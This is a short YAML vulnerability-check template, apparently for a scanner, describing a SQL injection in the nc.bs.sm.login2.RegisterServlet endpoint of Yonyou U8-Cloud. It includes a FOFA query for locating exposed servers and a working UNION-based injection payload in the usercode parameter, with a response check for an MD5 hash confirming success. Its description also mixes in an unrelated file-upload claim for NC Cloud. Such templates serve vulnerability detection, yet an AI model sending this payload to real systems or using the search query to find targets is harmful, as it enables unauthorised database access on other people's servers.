product: 用友U8-Cloud
vName: 用友U8-Cloud nc.bs.sm.login2.RegisterServlet接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8-Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。用友NC-Cloud nc.bs.sm.login2.RegisterServlet接口存在SQL注入漏洞
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485943&idx=1&sn=2287057cc4406b125320ea4c2e730c80&chksm=974b84f0a03c0de6ff44c88c20b5dc22cb748234bdf640fefb12feb3815f17d97e071dc7fe64&scene=178&cur_album_id=2873032428486115330#rd
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /servlet/~uap/nc.bs.sm.login2.RegisterServlet?usercode=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),NULL,NULL,NULL,NULL-- -
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and